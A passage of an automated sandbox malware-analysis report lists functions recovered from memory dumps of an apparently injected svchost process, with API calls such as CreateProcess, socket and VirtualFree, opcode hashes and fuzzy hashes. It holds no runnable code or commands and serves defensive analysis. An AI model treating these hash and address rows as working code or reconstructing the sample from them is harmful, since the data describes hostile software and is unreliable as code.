                                                                                                                • Instruction Fuzzy Hash: 4C611A71918A888BD765FF64D8956DFB7E1FB94300F404A2FE88BC2291DE34A645CB42
                                                                                                                Function 00007DF452630BC4 Relevance: 1.7, APIs: 1, Instructions: 184processCOMMON
                                                                                                                Download Yara Rule
                                                                                                                APIs
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 0000000E.00000003.2457794538.00007DF452601000.00000020.00000001.00020000.00000000.sdmp, Offset: 00007DF452601000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_14_3_7df452601000_svchost.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: CreateProcess
                                                                                                                • String ID:
                                                                                                                • API String ID: 963392458-0
                                                                                                                • Opcode ID: 116f0dd2ddb23dccfb2c6d9efb5d8776a97d5f43ca21374b7ec22c06ed2d75d4
                                                                                                                • Instruction ID: bea8612d4d86d6912c11be632615e506bdc6c8a77e327140e90aaf895b296d31
                                                                                                                • Opcode Fuzzy Hash: 116f0dd2ddb23dccfb2c6d9efb5d8776a97d5f43ca21374b7ec22c06ed2d75d4
                                                                                                                • Instruction Fuzzy Hash: 4B51203461C7888FEB64EB18D85576FB7E5FFA8310F00052FE88AC3291DA74E9058B56
                                                                                                                Function 00007DF4526184B4 Relevance: 1.6, APIs: 1, Instructions: 135COMMON
                                                                                                                Download Yara Rule
                                                                                                                APIs
                                                                                                                • TlsFree.KERNELBASE(?,?,?,?,?,?,?,00000000,?,?,00000000,00007DF4526137B8), ref: 00007DF4526185F1
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 0000000E.00000003.2457794538.00007DF452601000.00000020.00000001.00020000.00000000.sdmp, Offset: 00007DF452601000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_14_3_7df452601000_svchost.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: Free
                                                                                                                • String ID:
                                                                                                                • API String ID: 3978063606-0
                                                                                                                • Opcode ID: f566a557f405a15e9f60543e31327f656da7bfedb9a26ca6cc3cf471634a3ab7
                                                                                                                • Instruction ID: 3ab73c9e95b02afeb8225ca291c4392b19850022a2695b49e6a7ba2f51978c29
                                                                                                                • Opcode Fuzzy Hash: f566a557f405a15e9f60543e31327f656da7bfedb9a26ca6cc3cf471634a3ab7
                                                                                                                • Instruction Fuzzy Hash: B1418730B18A884FEB95FB68989556E73A1FF58700B144567EC1FD7385DE38FA018781
                                                                                                                Function 00007DF4526136BC Relevance: 1.6, APIs: 1, Instructions: 108COMMON
                                                                                                                Download Yara Rule
                                                                                                                APIs
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 0000000E.00000003.2457794538.00007DF452601000.00000020.00000001.00020000.00000000.sdmp, Offset: 00007DF452601000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_14_3_7df452601000_svchost.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: ErrorMode
                                                                                                                • String ID:
                                                                                                                • API String ID: 2340568224-0
                                                                                                                • Opcode ID: f23cc51c4f8b353fe516f6bce39a7c6d7a5c19314444e3e9c27b8b137a77efa4
                                                                                                                • Instruction ID: f9aae81bbedd1f9567869a511cd3e1492ebf2e384191151a587f387fe497dd2e
                                                                                                                • Opcode Fuzzy Hash: f23cc51c4f8b353fe516f6bce39a7c6d7a5c19314444e3e9c27b8b137a77efa4
                                                                                                                • Instruction Fuzzy Hash: E7317F61F189845BFA9CFB68988296E72F2EF44301B50443BEC0FD73D2D918BA558686
                                                                                                                Function 0000024F6A2A1870 Relevance: 1.6, APIs: 1, Instructions: 96COMMON
                                                                                                                Download Yara Rule

                                                                                                                Control-flow Graph

                                                                                                                APIs
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 0000000E.00000002.2458604547.0000024F6A2A0000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000024F6A2A0000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_14_2_24f6a2a0000_svchost.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: MitigationPolicyProcess
                                                                                                                • String ID:
                                                                                                                • API String ID: 1088084561-0
                                                                                                                • Opcode ID: 26f3b5b73fc16ab59c2c5e195c9b4eeee4e831d251455a47b6c64e26f9aa79e3
                                                                                                                • Instruction ID: d9bc0c115db19ac5565cf223f2c475106e9bae5844169799fd0f804c532aa422
                                                                                                                • Opcode Fuzzy Hash: 26f3b5b73fc16ab59c2c5e195c9b4eeee4e831d251455a47b6c64e26f9aa79e3
                                                                                                                • Instruction Fuzzy Hash: 8331C330B80B074AEBE5976886987F172D8EBC5330F1681B9C225D30D9FA35C9CDC660
                                                                                                                Function 00007DF452659878 Relevance: 1.6, APIs: 1, Instructions: 93networkCOMMON
                                                                                                                Download Yara Rule
                                                                                                                APIs
                                                                                                                • socket.WS2_32(?,?,?,?,?,?,?,?,0000006B,0000006A,-00000002,00007DF452659999), ref: 00007DF4526598A5
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 0000000E.00000003.2457794538.00007DF452601000.00000020.00000001.00020000.00000000.sdmp, Offset: 00007DF452601000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_14_3_7df452601000_svchost.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: socket
                                                                                                                • String ID:
                                                                                                                • API String ID: 98920635-0
                                                                                                                • Opcode ID: 86d7a482115fca3b1edbfabc0ea113997d8865a312c8a59d6e9cd500ff1022fa
                                                                                                                • Instruction ID: b0e4b805c78f3c326c643a03338309d7a6517e314b9b6cd873eca224e01601a1
                                                                                                                • Opcode Fuzzy Hash: 86d7a482115fca3b1edbfabc0ea113997d8865a312c8a59d6e9cd500ff1022fa
                                                                                                                • Instruction Fuzzy Hash: 4C21B6307089054FEB48AB3898C826A73E1EB65325F50067BEC2FC63D2DA289D018A91
                                                                                                                Function 00007DF452616748 Relevance: 1.6, APIs: 1, Instructions: 89COMMON
                                                                                                                Download Yara Rule
                                                                                                                APIs
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 0000000E.00000003.2457794538.00007DF452601000.00000020.00000001.00020000.00000000.sdmp, Offset: 00007DF452601000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_14_3_7df452601000_svchost.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: getaddrinfo
                                                                                                                • String ID:
                                                                                                                • API String ID: 300660673-0
                                                                                                                • Opcode ID: d71c148318ebab0212e0ff4e63ac06651667363ede8e313c62273446d7f796c6
                                                                                                                • Instruction ID: c87237e8df23efb68493a2891bd6729b6a6196d500f8038986e97d052c09b165
                                                                                                                • Opcode Fuzzy Hash: d71c148318ebab0212e0ff4e63ac06651667363ede8e313c62273446d7f796c6
                                                                                                                • Instruction Fuzzy Hash: 63313E74608A498FEB54EF28C898B5A77E1FF98704F10416ADC4ED7395DB39E902CB41
                                                                                                                Function 00007DF452658420 Relevance: 1.6, APIs: 1, Instructions: 77networkCOMMON
                                                                                                                Download Yara Rule
                                                                                                                APIs
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 0000000E.00000003.2457794538.00007DF452601000.00000020.00000001.00020000.00000000.sdmp, Offset: 00007DF452601000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_14_3_7df452601000_svchost.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: socket
                                                                                                                • String ID:
                                                                                                                • API String ID: 98920635-0
                                                                                                                • Opcode ID: 640abeb5c6b2b1bc35f62c2643cd99f43d88f06d202f511bb8515c624a1d4051
                                                                                                                • Instruction ID: 01cf25914a2acfbeca2fa3a4373b59e1097725d7f312069a07e97f4793ba0752
                                                                                                                • Opcode Fuzzy Hash: 640abeb5c6b2b1bc35f62c2643cd99f43d88f06d202f511bb8515c624a1d4051
                                                                                                                • Instruction Fuzzy Hash: 5011DA3070890A4FE758BB6C888476E72E1FB98314F90463BEC1FC67C2DB28AD468341
                                                                                                                Function 00007DF452602B48 Relevance: 1.6, APIs: 1, Instructions: 52threadCOMMON
                                                                                                                Download Yara Rule
                                                                                                                APIs
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 0000000E.00000003.2457794538.00007DF452601000.00000020.00000001.00020000.00000000.sdmp, Offset: 00007DF452601000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_14_3_7df452601000_svchost.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: ResumeThread
                                                                                                                • String ID:
                                                                                                                • API String ID: 947044025-0
                                                                                                                • Opcode ID: 3861752e6b5c76be2cebb9ad67872b18419a5ea734a6e2a755e753fd2cd8f93e
                                                                                                                • Instruction ID: f142737b0c88ccae9b91944de967861cb18a81119c96ba05a8e6208a55c563c8
                                                                                                                • Opcode Fuzzy Hash: 3861752e6b5c76be2cebb9ad67872b18419a5ea734a6e2a755e753fd2cd8f93e
                                                                                                                • Instruction Fuzzy Hash: 6001A230A149098FDB54AB79DC8862A73E6FF88315B444076EC0AC7344DB7AA991CB50
                                                                                                                Function 00007DF452658374 Relevance: 1.5, APIs: 1, Instructions: 43COMMON
                                                                                                                Download Yara Rule
                                                                                                                APIs
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 0000000E.00000003.2457794538.00007DF452601000.00000020.00000001.00020000.00000000.sdmp, Offset: 00007DF452601000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_14_3_7df452601000_svchost.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: closesocket
                                                                                                                • String ID:
                                                                                                                • API String ID: 2781271927-0
                                                                                                                • Opcode ID: 88f570aa19942cbceb8937b7800559f16cfa9926cc3a62739dcadfc924c76aed
                                                                                                                • Instruction ID: d52b3a811129a24b6144b39431edadcab76a8867821e10bd08553339ffad09f7
                                                                                                                • Opcode Fuzzy Hash: 88f570aa19942cbceb8937b7800559f16cfa9926cc3a62739dcadfc924c76aed
                                                                                                                • Instruction Fuzzy Hash: BF012C70A14A498FEB94DF58C4C87253AE4EF54329F8411A7DC0ACA396D775D9D0C780
                                                                                                                Function 00007DF452602D94 Relevance: 1.5, APIs: 1, Instructions: 33memoryCOMMON
                                                                                                                Download Yara Rule
                                                                                                                APIs
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 0000000E.00000003.2457794538.00007DF452601000.00000020.00000001.00020000.00000000.sdmp, Offset: 00007DF452601000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_14_3_7df452601000_svchost.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: CreateHeap
                                                                                                                • String ID:
                                                                                                                • API String ID: 10892065-0
                                                                                                                • Opcode ID: f69c4423fc2f9dc24249204a85e6f753c59304eed0840573d92f1e176759654c
                                                                                                                • Instruction ID: 2f3d26ce218c10f50d54b371cf4ecd81bd938d74b2c7a54bbb58e5b67e2ef777
                                                                                                                • Opcode Fuzzy Hash: f69c4423fc2f9dc24249204a85e6f753c59304eed0840573d92f1e176759654c
                                                                                                                • Instruction Fuzzy Hash: 14F0E521E0CA5D4BE714BA7A6CC026F21A2EF84320F24453BDD0FC27C1D979ADC16650
                                                                                                                Function 00007DF452613424 Relevance: 1.5, APIs: 1, Instructions: 31COMMON
                                                                                                                Download Yara Rule
                                                                                                                APIs
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 0000000E.00000003.2457794538.00007DF452601000.00000020.00000001.00020000.00000000.sdmp, Offset: 00007DF452601000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_14_3_7df452601000_svchost.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: AddressCallerProc
                                                                                                                • String ID:
                                                                                                                • API String ID: 2663294120-0
                                                                                                                • Opcode ID: b55f2987ccf9d47b878492792b43a4e8323f4fb48d1ec303df731e7bfe889620
                                                                                                                • Instruction ID: 03beab5974b58773a88a193facd4f02f4bdc343090cb77d074e51c7f70233d8d
                                                                                                                • Opcode Fuzzy Hash: b55f2987ccf9d47b878492792b43a4e8323f4fb48d1ec303df731e7bfe889620
                                                                                                                • Instruction Fuzzy Hash: 71E08C11B08C091B6B6861AE248857A55D6CBD8122304027BE81EC2395ED188C910380
                                                                                                                Function 00007DF452630DCC Relevance: 1.5, APIs: 1, Instructions: 30COMMON
                                                                                                                Download Yara Rule
                                                                                                                APIs
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 0000000E.00000003.2457794538.00007DF452601000.00000020.00000001.00020000.00000000.sdmp, Offset: 00007DF452601000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_14_3_7df452601000_svchost.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: FilePointer
                                                                                                                • String ID:
                                                                                                                • API String ID: 973152223-0
                                                                                                                • Opcode ID: 4c721ddc8cb176db938021c85e5f400d5d7596dc62bee08ed1c2796866c985cb
                                                                                                                • Instruction ID: 185d46c588ea2e4567bcae6b34181abe55dfdcdb206542bcc00ac7c0aea2c954
                                                                                                                • Opcode Fuzzy Hash: 4c721ddc8cb176db938021c85e5f400d5d7596dc62bee08ed1c2796866c985cb
                                                                                                                • Instruction Fuzzy Hash: 93E0C232B191240BE72C6ABD2C8917A36CAC7CC572B06827BFC06C3284DC68CC5602D0
                                                                                                                Function 00007DF4526133F8 Relevance: 1.5, APIs: 1, Instructions: 24libraryCOMMON
                                                                                                                Download Yara Rule
                                                                                                                APIs
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 0000000E.00000003.2457794538.00007DF452601000.00000020.00000001.00020000.00000000.sdmp, Offset: 00007DF452601000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_14_3_7df452601000_svchost.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: LibraryLoad
                                                                                                                • String ID:
                                                                                                                • API String ID: 1029625771-0
                                                                                                                • Opcode ID: deadc42d593f6e2d9e8bf000e5cc548490ab76c2dd2841c06e942c08cce04583
                                                                                                                • Instruction ID: fe44093861f1313d87bf95ddd061b3b579c847606133216e2e22d32bd3782320
                                                                                                                • Opcode Fuzzy Hash: deadc42d593f6e2d9e8bf000e5cc548490ab76c2dd2841c06e942c08cce04583
                                                                                                                • Instruction Fuzzy Hash: B8D05E20724D0E0BEA4C676D1C9572A51A5EBDC221B50013BAC0AC2381E958DD650200
                                                                                                                Function 00007DF452622B9C Relevance: 1.4, APIs: 1, Instructions: 153COMMON
                                                                                                                Download Yara Rule
                                                                                                                APIs
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 0000000E.00000003.2457794538.00007DF452601000.00000020.00000001.00020000.00000000.sdmp, Offset: 00007DF452601000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_14_3_7df452601000_svchost.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: malloc
                                                                                                                • String ID:
                                                                                                                • API String ID: 2803490479-0
                                                                                                                • Opcode ID: a190d55e66fa9972329321cd9e5dea0e61da3d8956b03d4ece5cfa8d531b37a8
                                                                                                                • Instruction ID: 3a82987bdbc335845a3a13d6b55bdddd5ef5ce37a1111fd12def877f57fe0446
                                                                                                                • Opcode Fuzzy Hash: a190d55e66fa9972329321cd9e5dea0e61da3d8956b03d4ece5cfa8d531b37a8
                                                                                                                • Instruction Fuzzy Hash: 5E411B70618E4D8FEBA4EF18C8857AA77E1FB68310F50466AD84EC7391DB34E944CB81
                                                                                                                Function 00007DF45261DA74 Relevance: 1.4, APIs: 1, Instructions: 147COMMON
                                                                                                                Download Yara Rule
                                                                                                                APIs
                                                                                                                  • Part of subcall function 00007DF45262E150: NtAcceptConnectPort.NTDLL(?,?,?,?,?,?,?,?,?,00007DF45262C0F7), ref: 00007DF45262E160
                                                                                                                • malloc.MSVCRT ref: 00007DF45261DB44
                                                                                                                  • Part of subcall function 00007DF4526277EC: malloc.MSVCRT(?,?,?,?,?,FFFFFFFF,-00000001,-00000002,-00000001,00007DF45264740A), ref: 00007DF45262780B
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 0000000E.00000003.2457794538.00007DF452601000.00000020.00000001.00020000.00000000.sdmp, Offset: 00007DF452601000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_14_3_7df452601000_svchost.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: malloc$AcceptConnectPort
                                                                                                                • String ID:
                                                                                                                • API String ID: 1211516610-0
                                                                                                                • Opcode ID: 5565b0a7f35f124f6bcd3fbf3053ca4a01fc296d0f2770306c12d9fdd2224762
                                                                                                                • Instruction ID: 6770322c1198cbae052f2ad025b2d4348be246a4089011e8fdc316067304e199
                                                                                                                • Opcode Fuzzy Hash: 5565b0a7f35f124f6bcd3fbf3053ca4a01fc296d0f2770306c12d9fdd2224762
                                                                                                                • Instruction Fuzzy Hash: 9F412A70508A488FEB64EF19D8897AA77E5FB58301F10417BDC4EC7351DA34E985CB92
                                                                                                                Function 00007DF452627598 Relevance: 1.4, APIs: 1, Instructions: 139COMMON
                                                                                                                Download Yara Rule
                                                                                                                APIs
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 0000000E.00000003.2457794538.00007DF452601000.00000020.00000001.00020000.00000000.sdmp, Offset: 00007DF452601000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_14_3_7df452601000_svchost.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: malloc
                                                                                                                • String ID:
                                                                                                                • API String ID: 2803490479-0
                                                                                                                • Opcode ID: 07a9124dfceae028a3317908ae6002e6db3b01a657e18977bfda4f97c253f38a
                                                                                                                • Instruction ID: 1164d25e75243c171b39a9fc9df9c26e5ba728f5ac1e3112bd421c5915d26c25
                                                                                                                • Opcode Fuzzy Hash: 07a9124dfceae028a3317908ae6002e6db3b01a657e18977bfda4f97c253f38a
                                                                                                                • Instruction Fuzzy Hash: 2C418331608D0E8FDB84EF2CD888EA977E0FB68351711466BD80AC3751DB34E9848BC1
                                                                                                                Function 00007DF452604F54 Relevance: 1.4, APIs: 1, Instructions: 126COMMON
                                                                                                                Download Yara Rule
                                                                                                                APIs
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 0000000E.00000003.2457794538.00007DF452601000.00000020.00000001.00020000.00000000.sdmp, Offset: 00007DF452601000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_14_3_7df452601000_svchost.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: malloc
                                                                                                                • String ID:
                                                                                                                • API String ID: 2803490479-0
                                                                                                                • Opcode ID: 81c6eecad20e58c8d38abd6a23315df80df12776ef0665d00e4ffea17a923ccf
                                                                                                                • Instruction ID: e8d919a2db4b9a5459c5747c3af9499acb3d1c7c2662139d65a0cfed18bd4745
                                                                                                                • Opcode Fuzzy Hash: 81c6eecad20e58c8d38abd6a23315df80df12776ef0665d00e4ffea17a923ccf
                                                                                                                • Instruction Fuzzy Hash: 6331C230608A8A9BE768FA64D84596AB3F4FF50350B10862BDC1FC2791EF64FA4197C1
                                                                                                                Function 00007DF45262F5CC Relevance: 1.4, APIs: 1, Instructions: 121COMMON
                                                                                                                Download Yara Rule
                                                                                                                APIs
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 0000000E.00000003.2457794538.00007DF452601000.00000020.00000001.00020000.00000000.sdmp, Offset: 00007DF452601000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_14_3_7df452601000_svchost.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: calloc
                                                                                                                • String ID:
                                                                                                                • API String ID: 2635317215-0
                                                                                                                • Opcode ID: 51eb558422bbb07d68cd050985e80f4d6919dc7d059917d871d23eb38f6f5020
                                                                                                                • Instruction ID: a53627a18be2118c416220ab6f8f157f0edea657a987c66b5480395e1444d938
                                                                                                                • Opcode Fuzzy Hash: 51eb558422bbb07d68cd050985e80f4d6919dc7d059917d871d23eb38f6f5020
                                                                                                                • Instruction Fuzzy Hash: 6631E831B0C94A4FE7586E58988557E33E4EB89321F30463FED8FC33A1DA28BD124681
                                                                                                                Function 00007DF452615C3F Relevance: 1.4, APIs: 1, Instructions: 107COMMON
                                                                                                                Download Yara Rule
                                                                                                                APIs
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 0000000E.00000003.2457794538.00007DF452601000.00000020.00000001.00020000.00000000.sdmp, Offset: 00007DF452601000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_14_3_7df452601000_svchost.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: calloc
                                                                                                                • String ID:
                                                                                                                • API String ID: 2635317215-0
                                                                                                                • Opcode ID: 6a4f20b682c10cd58629493a9c6e97ff52dacf867127907d93805cb69a04b7ae
                                                                                                                • Instruction ID: c669847e1ee5852f5780abef44dfa5d2ef86cfc62b95fecf1c4b43de33d17ee0
                                                                                                                • Opcode Fuzzy Hash: 6a4f20b682c10cd58629493a9c6e97ff52dacf867127907d93805cb69a04b7ae
                                                                                                                • Instruction Fuzzy Hash: E5315E3161CE498FDB55FB18C481A9AB3E1FFA5350F50426BD84AC7391DA35FA41CB81
                                                                                                                Function 00007DF4526277EC Relevance: 1.3, APIs: 1, Instructions: 91COMMON
                                                                                                                Download Yara Rule
                                                                                                                APIs
                                                                                                                • malloc.MSVCRT(?,?,?,?,?,FFFFFFFF,-00000001,-00000002,-00000001,00007DF45264740A), ref: 00007DF45262780B
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 0000000E.00000003.2457794538.00007DF452601000.00000020.00000001.00020000.00000000.sdmp, Offset: 00007DF452601000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_14_3_7df452601000_svchost.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: malloc
                                                                                                                • String ID:
                                                                                                                • API String ID: 2803490479-0
                                                                                                                • Opcode ID: f31908e5917b62f5e8fcfc63ea224ee910f3ac586d2aa649c3aaf2b7337a1fee
                                                                                                                • Instruction ID: 32d2f8fe5d0be3d657d64519a39adb3b3306db5e651469aba4c53afe064d93a2
                                                                                                                • Opcode Fuzzy Hash: f31908e5917b62f5e8fcfc63ea224ee910f3ac586d2aa649c3aaf2b7337a1fee
                                                                                                                • Instruction Fuzzy Hash: BB21C331614D0C8FDB49EF1CD88CAA577E1EB6831130441A7DC0ACB355DA24E984CB91
                                                                                                                Function 00007DF4526FCB9C Relevance: 1.3, APIs: 1, Instructions: 89COMMON
                                                                                                                Download Yara Rule
                                                                                                                APIs
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 0000000E.00000003.2457794538.00007DF452601000.00000020.00000001.00020000.00000000.sdmp, Offset: 00007DF452601000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_14_3_7df452601000_svchost.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: free
                                                                                                                • String ID:
                                                                                                                • API String ID: 1294909896-0
                                                                                                                • Opcode ID: 472e16019ba601094a4c2923f039f601fa415deb3ae2891c44a4e6fa2e872d25
                                                                                                                • Instruction ID: f91d22e654333b25e1c6e3ab121d99970b8414084964be6863ea512ef307f8ab
                                                                                                                • Opcode Fuzzy Hash: 472e16019ba601094a4c2923f039f601fa415deb3ae2891c44a4e6fa2e872d25
                                                                                                                • Instruction Fuzzy Hash: 87214F72A288188FDEA4FA1CC4D895977E1FF88310B6502A3DC1EC73ADD525ED80C780
                                                                                                                Function 00007DF4526131B4 Relevance: 1.3, APIs: 1, Instructions: 71stringCOMMON
                                                                                                                Download Yara Rule
                                                                                                                APIs
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 0000000E.00000003.2457794538.00007DF452601000.00000020.00000001.00020000.00000000.sdmp, Offset: 00007DF452601000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_14_3_7df452601000_svchost.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: lstrcmpi
                                                                                                                • String ID:
                                                                                                                • API String ID: 1586166983-0
                                                                                                                • Opcode ID: 66b33f43179977e6021ab23a99b744e2774dbd865e09dbf7877d2203174fb5a6
                                                                                                                • Instruction ID: c1bf8d19c30c30c4a2a8b342f22193bbdc37eb2943861beb14af3bc681fec322
                                                                                                                • Opcode Fuzzy Hash: 66b33f43179977e6021ab23a99b744e2774dbd865e09dbf7877d2203174fb5a6
                                                                                                                • Instruction Fuzzy Hash: C6116330F045444AE7ACF779989936B36E1EF94200B54427BDC0FD27A6FD2CAA14D650
                                                                                                                Function 00007DF45261D818 Relevance: 1.3, APIs: 1, Instructions: 57COMMON
                                                                                                                Download Yara Rule
                                                                                                                APIs
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 0000000E.00000003.2457794538.00007DF452601000.00000020.00000001.00020000.00000000.sdmp, Offset: 00007DF452601000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_14_3_7df452601000_svchost.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: Path$AcceptConnectNameName_Portcallocmalloc
                                                                                                                • String ID:
                                                                                                                • API String ID: 1226643809-0
                                                                                                                • Opcode ID: d511f70975a129a2a77dd28de2b940d4a8b4f0af03d16e9a8499343f86fd52b2
                                                                                                                • Instruction ID: 225d105fbe84d46fdf54f852f8ce4432687fc11f846255a22fb53e3d95f8492f
                                                                                                                • Opcode Fuzzy Hash: d511f70975a129a2a77dd28de2b940d4a8b4f0af03d16e9a8499343f86fd52b2
                                                                                                                • Instruction Fuzzy Hash: 7501F731214E084FE748BB5CA8894B677D1E799762704417BE40AC3251DD35E8418BD1
                                                                                                                Function 00007DF45260272C Relevance: 1.3, APIs: 1, Instructions: 48COMMON
                                                                                                                Download Yara Rule
                                                                                                                APIs
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 0000000E.00000003.2457794538.00007DF452601000.00000020.00000001.00020000.00000000.sdmp, Offset: 00007DF452601000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_14_3_7df452601000_svchost.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: FreeVirtual
                                                                                                                • String ID:
                                                                                                                • API String ID: 1263568516-0
                                                                                                                • Opcode ID: 352c65fe592b7790d915c399a828791dec36a0441c5dd9355c9a9937d9e241a1
                                                                                                                • Instruction ID: c1b6325f4d1884c3f40db735fdcd0e8ad5de878ba6386d7ba62138747451a020
                                                                                                                • Opcode Fuzzy Hash: 352c65fe592b7790d915c399a828791dec36a0441c5dd9355c9a9937d9e241a1
                                                                                                                • Instruction Fuzzy Hash: 24018630A18D0A8BDB98EB2C880462B32F1FF58315754817FD80EC73D0D679F9429741
                                                                                                                Function 00007DF45262778C Relevance: 1.3, APIs: 1, Instructions: 42COMMON
                                                                                                                Download Yara Rule
                                                                                                                APIs
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 0000000E.00000003.2457794538.00007DF452601000.00000020.00000001.00020000.00000000.sdmp, Offset: 00007DF452601000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_14_3_7df452601000_svchost.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: free
                                                                                                                • String ID:
                                                                                                                • API String ID: 1294909896-0
                                                                                                                • Opcode ID: 89be67091896b1da07f700886e1e4d9fcad1effbef51436963846972d87fbccb
                                                                                                                • Instruction ID: 9ad21f7e09a75802ddc3da6786062948648e068d4f8575272a2fd512f872923c
                                                                                                                • Opcode Fuzzy Hash: 89be67091896b1da07f700886e1e4d9fcad1effbef51436963846972d87fbccb
                                                                                                                • Instruction Fuzzy Hash: F2F01D70615E0A8FEB85EF19C498B2A73E1FB69305F60017BD81AC3290D779A994C711
                                                                                                                Function 0000024F6A2A19B4 Relevance: 1.3, APIs: 1, Instructions: 40COMMON
                                                                                                                Download Yara Rule

                                                                                                                Control-flow Graph

                                                                                                                • Executed
                                                                                                                • Not Executed
                                                                                                                control_flow_graph 80 24f6a2a19b4-24f6a2a19d1 82 24f6a2a19dd-24f6a2a19e4 80->82 83 24f6a2a19d3-24f6a2a19da 80->83 84 24f6a2a19fb-24f6a2a1a09 82->84 85 24f6a2a19e6-24f6a2a19f9 VirtualFree 82->85 83->82 85->84
                                                                                                                APIs
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 0000000E.00000002.2458604547.0000024F6A2A0000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000024F6A2A0000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_14_2_24f6a2a0000_svchost.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: FreeVirtual
                                                                                                                • String ID:
                                                                                                                • API String ID: 1263568516-0
                                                                                                                • Opcode ID: 35bf1a61f723f2ebe461f85329f49c45ff48ebd9128404ff90ab1984f0afa418
                                                                                                                • Instruction ID: 3920eeaaa85baedb256501f8c813ef77b1f002b37d0c576acc181f44b1448f62
                                                                                                                • Opcode Fuzzy Hash: 35bf1a61f723f2ebe461f85329f49c45ff48ebd9128404ff90ab1984f0afa418
                                                                                                                • Instruction Fuzzy Hash: ACF03031254A098FDF5CEE55C5C8BB133A4FB28301F04017ACD0ACB15ADA21E881C751
                                                                                                                Function 00007DF452604090 Relevance: 1.3, APIs: 1, Instructions: 40COMMON
                                                                                                                Download Yara Rule
